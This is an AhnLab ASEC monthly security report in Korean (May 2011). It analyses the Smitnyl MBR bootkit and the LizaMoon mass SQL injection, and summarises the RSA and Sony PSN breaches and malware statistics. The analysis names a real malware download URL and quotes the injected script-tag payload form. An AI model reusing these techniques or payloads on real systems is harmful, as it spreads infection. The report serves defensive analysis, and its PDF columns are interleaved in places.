25 26 A. 'Hidden' 속성으로 IEXPLORE.EXE 실행후자신을인젝션먼저 c:\program files\internet Explorer\IEXPLORE.EXE 경로를얻어와서 WinExec API를이용해 Hidden 속성으로 IEXPLORE.EXE를실행하고 VirtualAllocEx API로실행중인 IEXPLORE.EXE에가상메모리공간을확보한후 WriteProcessMemory API를통해자신을인젝션한다. [ 그림 1-41] IEXPLORE.EXE 실행및인젝션 감염된 MBR의코드루틴을보면악성코드제작자가 MBR의구조뿐만아니라 FAT 와 NTFS파일시스템의구조또한모두파악하여부트레코드의값들과 MFT(Master File Table) 의헤더값, 속성값들을이용해서필요한데이터들을얻어오는것을확인할수있다. 이렇게획득한데이터들을이용해서최종적으로 userinit. exe 에대한정보를얻고미리 39번섹터에저장해놓은 Payload를읽어와서정상 userinit.exe 에덮어쓴다. 이렇게감염된 userinit.exe 와정상 userinit.exe 를구분하는간단한방법은파일의등록정보를확인해보는 것이다. 정상파일에는버전등의정보가정확히나타나고있지만감염된파일에는이러한버전정보들을찾을수가없다. 그리고 Hex view 도구를통해 raw data들을보게되면감염된파일의 0x28 오프셋에 55 AA 시그니쳐가있는것을확인할수있다. 이시그니쳐는실제악의적인코드내에서감염여부를확인하기위해사용된다. [ 그림 1-45] 정상 userinit.exe 와감염된 userinit.exe 비교 B. 파일내려받기및실행 CreateRemoteThread 를통해인젝션된코드를실행하고 http://sb.perfectexe.com/cs.gif 를내려받아 C:\2008.exe 로저장하고실행한다. [ 그림 1-42] 파일다운로드및실행 3. 감염된 MBR 의동작 정상 MBR의주요동작은파티션테이블에서부팅가능한파티션을찾아해당파티션의부트섹터를호출해주는역할을하는것인데감염된시스템의 MBR은이런동작외에도정상 userinit.exe를감염시키기위해 BOOT.INI 파일과 WINDOWS, SYSTEM32 디렉터리정보를얻고 39번섹터에서감염하고자하는데이터를읽어정상 userinit.exe를감염시킨다. [ 그림 1-46] 감염된 MBR 내의정상 userinit.exe 감염루틴 [ 그림 1-43] 정상 MBR 의동작 [ 그림 1-44] 감염된 MBR 의동작
27 28 02. 시큐리티동향 a. 시큐리티통계 4 월 MS 보안업데이트현황 마이크로소프트사로부터발표된이번달보안업데이트는 17 건이다. 패치개수 System IE Office Application Sever A. 정상 userinit.exe 감염감염된 MBR의마지막동작은 [ 그림 1-46] 에서볼수있듯이파일의속성을확인하고읽어야할섹터의시작위치와개수를얻은뒤에 Extended Write Function (AH = 43h) 을사용하여 39번섹터에저장된데이터를메모리 0x8C00 영역으로읽어오고제대로읽었는지확인하기위해시그니처값 0xAA55 를비교한다. 4. 진단 & 치료 2011년 4월현재 V3 IS 7.0으로테스트해본결과시스템이감염되기전개별적으로는모두정상진단 / 치료되지만시스템이감염된후에는감염된 MBR은진단 / 치료가불가능하고악성 userinit.exe는 Win-Trojan/ Agent.25600.YE 로정상진단은하지만치료시에는제품의 윈도주요파일시스템보호기능 에의해치료가되지않고있다. 즉, 시스템에서는 V3에의해치료되어야할악성파일이오히려보호되고있는상황이다. 위와같은상황이발생하는이유는과거 V3 제품군의엔진에도부트바이러스에대한진단 / 치료기능이있었지만 2010년 3월에예외적인 Defo 바이러스 치료이슈가발생한후부트바이러스에대한진단 / 치료기능이빠져있는상태이기때문이다. 이에대한방편으로현재이런상황의고객시스템은전용백신을제작하여제공하고있다. 전용백신에서는부트바이러스의특정영역의바이너리 ( 약 10byte) 를시그니쳐로잡고감염된 MBR의파티션테이블과백업되어있는 MBR의파티션테이블을비교해서같으면백업되어있는정상 MBR을덮어쓰고있다. 5. 결론 Smitnyl Bootkit 은 MBR을감염시키는기능이있으며이렇게 MBR을감염시키는경우에문제가심각한것은진단 / 치료하기가까다롭다는점이다. 아직국내에서감염에의한피해보고가적지만오히려감염여부도알지못하는경우가많을수도있다. 이렇게감염여부를확인하기가어렵기때문에많은악성코드제작자가매력을느끼기에충분하고확산이된다면안티바이러스업체들은진단 / 치료에더욱어려움을겪게될것이다. 현재발견된 Smitnyl Bootkit 의경우는내부에중국산하드웨어모니터링툴의존재를확인하고중국안티바이러스업체인 360Safe 의프로그램실행을방해하는것으로봐서는중국해커들에의해서제작 / 배포된것으로볼수있다. 이에대해해킹관련한중국온라인사이트나커뮤니티에대한모니터링을통해서관련한정보들을얻을수있을것이고이를바탕으로한사전연구로또다른방법의부트바이러스진단 / 치료방법의발견에도움이될것이다. 12 2011.03-2011.04 11 10 9 8 7 6 5 4 3 2 1 4 5 6 7 8 9 10 11 12 1 2 3 4 [ 그림 2-1] 공격대상기준별 MS 보안업데이트 위험도취약점 Poc 긴급 Internet Explorer 누적보안업데이트 (MS11-018) 유 긴급 SMB 클라이언트의취약점으로인한원격코드실행문제점 (MS11-019) 유 긴급 SMB 서버의취약점으로인한원격코드실행 (MS11-020) 무 긴급 ActiveX 킬비트누적보안업데이트 (MS11-027) 무 긴급.NET Framework 의취약점으로인한원격코드실행문제 (MS11-028) 무 긴급 GDI+ 취약점으로인한원격코드실행 (MS11-029) 무 긴급 DNS 확인취약점으로인한원격코드실행 (MS11-030) 무 긴급 Jscript 및 VBScript 스크립팅엔진의취약점으로인한원격코드실행 (MS11-031) 무 긴급 OpenType CFF 드라이버의취약점으로인한원격코드실행 (MS11-032) 무 중요 Microsoft Excel 의취약점으로인한원격코드실행 (MS11-021) 무 중요 Microsoft Office 의취약점으로인한원격코드실행 (MS11-022) 무 중요 Microsoft Office 의취약점으로인한원격코드실행 (MS11-023) 무 중요 Windows 팩스표지편집기의취약점으로인한원격코드실행 (MS11-024) 무 중요 MFC 라이브러리의취약점으로인한원격코드실행 (MS11-025) 무 중요 MHTML 의취약점으로인한정보유출 (MS11-026) 무 중요 워드패드텍스트변환기의취약점으로인한원격코드실행 (MS11-033) 무 중요 윈도우커널모드드라이버의취약점으로인한권한상승 (MS11-034) 무 [ 표 2-1] 2011년 04월주요 MS 보안업데이트 이번달에는꽤많은수의패치가발표되었다. 총 17 건이며, 시스템에해당하는취약점이 12 건으로가장 많다. 시스템에해당하는취약점은운영체제자체를직접적으로공격할수있는것이므로, 추가적인소프 트웨어설치없이위협에노출될수있는가능성을더욱넓게포괄하고있다. 패치중일부는공격코드가 공개되어있으며, 50% 가넘는 9 건이긴급에해당할만큼빠른보안패치가필요하다.
29 30 02. 시큐리티동향 b. 시큐리티이슈 이번 Lizamoon라고명명된대규모 SQL 인젝션공격을통해유포된악성코드들은 V3 제품군에서다음과같이진단한다. - Trojan/Win32.FakeAV 1) 2일간격으로 "2011 Recruitment Plan" 제목의메일을서로다른팀에소속된직원들에게발송. 타깃이된직원들의개인정보는소셜네트워크서비스 (Social Network Service) 를이용해수집 - Win-Trojan/Malware.2343424.F 2) 해당메일에는 2011 Recruitment plan.xls 라는첨부파일이존 - Win-Trojan/Malware.2332672.D 재하였으며해당파일은 3 월 15 일공개되었던어도비 (Adobe) 플래 - Win-Trojan/Malware.2329600.B 쉬플레이어 (Flash Player) 의제로데이 (Zero Day, 0-Day) 취약점 - Win-Trojan/Malware.2667520 (CVE-2011-0609) 을악용한 SWF 파일존재 LizaMoon 이라명명된대규모 SQL 인젝션공격 3월 29일미국보안업체인웹센스 (Websense) 는자사블로그 "LizaMoon mass injection hits over 226,000 URLs (was 28,000) including itunes" 를통해대규모 SQL 인젝션 (Injection) 공격이발생하였으며이로인해 226,000여웹페이지가침해사고를입은것으로알려졌다. 웹센스를통해알려진대규모 SQL 인젝션공격은해당공격을통해삽입된도메인명인 lizamoon.com에서이름을따와 Lizamoon으로명명되었다. ASEC에서는추가적인조사및분석을위해구글 (Google) 검색을이용하여 Lizamoon 인젝션공격으로인해한국웹사이트들이얼마나많은피해를입었는지점검하였다. 그결과해외사이트뿐만아니라 [ 그림 2-2] 와같이다수의웹사이트가해당인젝션공격에의한침해사고를당한것으로파악되었다. [ 그림 2-2] 구글검색결과나타난해킹된국내웹사이트들의예 http://[ 악성도메인 ]/ur.php -> http://[xxx.co.cc/scanxx/[ 숫자 ]?sessionid=[ 숫자들 ]] -> http://[xxx.co.cc/scanxx/[ 숫자 ]/freesystemscan.exe 최종적으로연결되는웹페이지는 [ 그림 2-3] 과같이허위백신을내려받도록유도하는페이지로연결된다. [ 그림 2-3] 해킹된웹사이트들의재연결을통해최종적으로허위백신설치유도 APT 보안위협에의한 RSA 침해사고발생 3월 18일국내외언론사들을통해암호화기술개발및 OTP(One Time Password) 제품개발및판매를하는 EMC/RSA 보안사업본부가외부침입으로인해 2 팩터인증 (2 Factor Authentication) 관련정보들이외부로유출되었다는사실이공개되었다. 이와함께 RSA에서는 Open Letter to RSA Customers 를 RSA 웹사이트에게시하고 RSA 내부에서발생한침해사고에대한사항들을전달함과동시에해당기술이도입된제품들을사용하는고객들에게주의를당부하고있다. RSA에서발생한침해사고는 APT(Advanced Persistent Threat) 형태의보안위협으로알려져있으며이러한형태의보안위협으로는 2010년 1월발생한구글해킹으로도알려진오퍼레이션오로라 (Operation Aurora), 2010년 7월에발생한이란원자력발전소를대상으로한스턱스넷 (Stuxnet), 그리고가장최근인 2011년 2월발생한글로벌에너지업체를대상으로한나이트드래곤 (Night Dragon) 보안위협등의침해사고있다. 4월 1일 RSA에서는해당웹사이트에 "Anatomy of an Attack" 이라는글을게시하고 RSA에서발생한침해사고가어떠한형태이며어떠한방법으로제품관련정보들이외부로유출되었는지비교적자세히밝히고있다. 3) 해당취약점을악용해 Poison Ivy( 원격제어형태의트로이목마 ) 악성코드감염 4) 감염된시스템을악용하여내부네트워크로접속후목표시스템의관리자권한으로권한상승 5) 목표시스템의데이터들을다른시스템으로복사후압축및암호화 6) 압축및암호화한데이터들을다시 RAR로암호설정압축하여 FTP를이용해외부에존재하는해킹된제 3의시스템으로전송이번에알려진 RSA의침해사고를정리하면 소셜네트워크서비스를이용하여공격목표에대한사전정보수집, 사회공학기법 (Social Engineering) 을악용해공격목표의악성코드감염, 범용적인소프트웨어의알려지지않은제로데이취약점이용 이라는 3가지요건들이주요하게결합된형태의 APT 보안위협으로볼수있다. 그러므로기업의보안관리자또는보안을전담하는조직에서는기업임직원들을대상으로사회공학기법을악용한공격형태에대한주기적인보안인식교육을제공하고, 기업내부네트워크및주요시스템에서발생하는이상징후들을평소주의깊게관찰해야만한다. RSA 에서공개한사고내용을정리하면다음과같다. 소니플레이스테이션네트워크 7,700 만명정보유출 [ 그림 2-4] RSA 침해사고가발생한순서도 ( 출처 : EMC/RSA) 전세계적으로많은게임사용자층을확보하고있는소니플레이스 이번 Lizamoon 인젝션공격에사용된악의적인웹페이지주소는총 11개이며아래와같은기본적인형식을가지고있다. <script src=http://[ 악성도메인 ]/ur.php></script> 웹페이지에삽입된주소는총 3 단계에걸친재연결 (Redirection) 구조를가지고있으며전체적인구조는다음과같다. 해당웹페이지에서내려받게되는파일은 freesystemscan.exe 이며파일크기는 ASD(AhnLab Smart Defense) 종합분석시스템에집계된데이터에서확인한결과, 2,343,424 바이트에서 2,702,848 바이트까지다양하게존재하였다. 이와같은취약한웹사이트를통해악성코드가유포되는방식은과거몇년전부터악성코드의또다른감염경로로자주이용되므로신뢰하고믿을수있는웹사이트라고하더라도감염을방지하기위해서는사용중인운영체제와웹브라우저를항상최신버전으로업데이트하는것을권장한다. 또한웹브라우저를통해유포되는악성코드의감염을예방하고사기사이트및피싱사이트를차단하는사이트가드 (SiteGuard) 와함께최신엔진으로업데이트된백신을같이사용하는것이중요하다. 테이션네트워크에데이터유출이라는초유의사건이발생하였다. 최근국내금융기관중하나인현대캐피탈에서도 42만명의정보가유출된경우가있지만, 소니사에서운영중인플레이스테이션네트워크의사용자수하고는비교자체가되지않을만큼대량정보유출이발생한것이다. 현재언론에서확인되고있는정보유출량은약 7,700 만명에해당한다. 이름, 주소, 이메일주소, 생년월일, 사용자아이디, 사용자패스워드, 로그인정보등단순히제한적으로정보가유출된것과는달리많은정보가유출된것으로보인다. 이러한사실이확인되면서플레이스테이션네트워크는즉각네트워크에서분리되었고, 이로인해플레이스테이션게임사용자는접속이안돼게임을다운로드하지못하거나, 인터넷을통한플레이를즐기지못하게된것이다. 소니사에의하면플레이스테이션네트워크와큐리오시티서비스는 4월17일과 4월19일사이에침해사고가발생한것으로보고
31 32 있으며, 얼마나많은정보가유출되었는지는자세히밝히지않고있다. 신용카드정보도유출되었는지에대한정확한증거는없지만유출되었을가능성이있어, 앞으로이정보를이용한악의적인사건 / 사고가발생할소지가충분하다. 방통위에서도이번소니의정보유출과관련하여국내에는약 23만명정도로추정하며, 동일한비밀번호를사용한다면바꿀것을권장하고있다. 다만, 소니사가사고발생후, 1주일이나지나서정보유출가능성을언급하였기때문에이미일부사용자는추가적인 2차피해를입었을가능성이높다. 과거에이런정보유출이일어난경우의대표적인피해는원하지않는스팸메일을받게되는경우가대부분이었다. 예를들어, 올 3월달에 Play. com 에서사용자정보유출이있었는데, 한사용자가 Play.com 에서만등록하여사용하는이메일주소인데유출된후부터스팸메일이들어오기시작하였다고한다. 실제로유출된정보가스팸및기타악의적인용도로이용되는것이다. 이번사건은소니플레이스테이션네트워크의사례에만국한되는것이아니라, 언제든국내에서도이와유사한사고가발생할수있다. 기업들은고객정보를안전하게보호하기위한방안을강구해야할것이다. 03. 웹보안동향 a. 웹보안통계 웹사이트보안요약 악성코드발견건수는 107,713 건이고, 악성코드유형은 704 건이며, 악성코드가발견된도메인은 720 건이며, 악성코드발견된 URL 은 2,605 건이다. 2011 년 4 월은 2011 년 3 월보다악성코드유형, 악 성코드가발견된도메인, 악성코드발견된 URL 은다소감소하였으나, 악성코드발견건수는증가하 였다. 구분 건수 악성코드배포 URL 차단건수 107,713 악성코드유형 704 악성코드가발견된도메인 720 악성코드가발견된 URL 2,605 [ 표 3-1] 웹사이트보안요약 월별악성코드배포 URL 차단건수 2011 년 4 월악성코드발견건수는전달의 99,034 건에비해 109% 수준인 107,713 건이다. 10,000 99,034 107,713 5,000 61,817 0 2011.02 2011.03 2011.04 [ 그림 3-1] 월별악성코드발견건수
33 34 월별악성코드유형 악성코드유형별배포수 2011 년 4 월악성코드유형은전달의 759 건에비해 93% 수준인 704 건이다. 악성코드유형별배포수에서애드웨어류가 14,371 건전체의 13.3% 로 1 위를차지하였으며, 트로잔 류가 7,602 건으로전체의 7.1% 로 2 위를차지하였다. 1,000 774 759 704 750 500 250 0 2011.02 2011.03 2011.04 [ 그림 3-2] 월별악성코드유형월별악성코드가발견된도메인 2011년 4월악성코드가발견된도메인은전달의 789건에비해 91% 수준인 720건이다. 구분건수비율 ADWARE 14,371 13.3 % TROJAN 7,602 7.1 % DROPPER 2,668 2.5 % DOWNLOADER 1,727 1.6 % JOKE 1,024 1.0 % Win32/VIRUT 570 0.5 % APPCARE 199 0.2 % SPYWARE 62 0.1 % ETC 79,490 73.8 % Total 107,713 100 % [ 표 3-2] 악성코드유형별배포수 75,000 79,490 10,00 774 789 720 5,00 14,371 7,602 1,727 570 2,668 199 62 1,024 Adware Trojan Downloader Win32/VIRUS Dropper Appcare Spyware Joke ETC 0 2011.02 [ 그림 3-3] 월별악성코드가발견된도메인 2011.03 2011.04 [ 그림 3-5] 악성코드유형별배포수 악성코드배포순위 악성코드배포 Top10 에서 Win32/Induc 이 51,683 건으로 1 위를차지하였으며, Top10 에 Virus/Win32. 월별악성코드가발견된 URL 2011 년 4 월악성코드가발견된 URL 은전달의 4,259 건에비해 61% 수준인 2,605 건이다. Induc 등 3 건이새로등장하였다. 순위등락악성코드명건수비율 5,000 2,500 3,367 0 2011.02 [ 그림 3-4] 월별악성코드가발견된 URL 4,259 2,605 2011.03 2011.04 1 2 Win32/Induc 51,683 58.1 % 2 NEW Virus/Win32.Induc 23,612 26.6 % 3 2 Win-Adware/Shortcut.InlivePlayerActiveX.234 3,355 3.8 % 4 2 Win-Adware/Shortcut.Unni82.3739648 2,249 2.5 % 5 5 Win-Adware/Shortcut.Bestcode.0002 1,537 1.7 % 6 2 Win-Adware/ToolBar.Cashon.308224 1,455 1.6 % 7 NEW Win-Trojan/StartPage.40960.AH 1,449 1.6 % 8 Win-Adware/Shortcut.Tickethom.36864 1,319 1.5 % 9 2 Adware/Win32.ToolBar 1,224 1.4 % 10 NEW Win-Joke/Stressreducer.1286147 1,010 1.1 % 88,893 100 % [ 표 3-3] 악성코드배포 Top 10
35 2011.05. VOL. 16 ASEC REPORT Contributors 03. 웹보안동향 b. 웹보안이슈 편집장선임연구원 안형봉 집필진 책임연구원 정관진 선임연구원 안창용 선임연구원 장영준 2011 년 04 월침해사이트현황 [ 그림 3-6] 은월별악성코드유포했던사이트의현황을나타낸것으로 2월이후로꾸준히증가하고있는추세이다. 이는허니팟에서모니터링하는사이트들에서침해사고가발생하여악성코드유포가증가했기때문인것으로보인다. 1. 윈도우정상파일을악성코드로교체 2. Adobe Flash Player 존재하는취약점을이용한악성코드유포증가자세한정보는아래주소에서볼수있다. - imm32.dll 교체악성코드, 당신 PC의권한을탐하다. : http://core. ahnlab.com/283 연구원연구원감수상무 이현목조보화조시행 [ 그림 3-6] 2011 년 4 월악성코드유포목적의침해사이트현황 200 180 160 140 - 윈도우정상파일을악성코드로교체하는 Win-Trojan/ Agent.30904.H: http://core.ahnlab.com/280 - 악성플래시파일, 당신의 PC를노린다.: http://core.ahnlab. com/282 참여연구원 ASEC 연구원 SiteGuard 연구원 120 100 80 60 40 20 0 1 2 3 4 5 6 7 8 9 10 11 12 [ 표 3-4] 는 4 월한달간여러사이트들을통해서가장많이유포된 악성코드들에대한순위를나타낸것으로지난 3 월과비교해보면 중복된악성코드가없는데그원인은백신업체들의빠른대응으로 악성코드의생명주기가짧아졌고동일한목적을가진변종의유포 주기가짧아졌기때문인것으로보인다. 4 월한달간해킹된웹사이 Disclosure to or reproduction 트들을통해서유포된악성코드들의동향을요약해보면아래와같다. for others without the specific written authorization of AhnLab is [ 표 3-4] 해킹된웹사이트를통해서유포된악성코드 Top 10 prohibited. 순위진단명 URL Copyright (c) AhnLab, Inc. 1 Win-Trojan/Patcher.34816.C 20 2 Win-Trojan/Onlinegamehack.89758 19 3 Win-Trojan/Onlinegamehack.36864.FI 18 4 Win-Trojan/Onlinegamehack.149019 18 5 Win-Trojan/PatchedImm.Gen 18 6 Dropper/Onlinegamehack.148564 17 7 Win-Trojan/Injector.59581 17 8 Win-Trojan/Onlinegamehack.286303 17 9 Win-Trojan/Onlinegamehack.287407 17 10 Win-Trojan/Killav.88192 17 11 Win-Trojan/Patcher.34816.C 20 All rights reserved.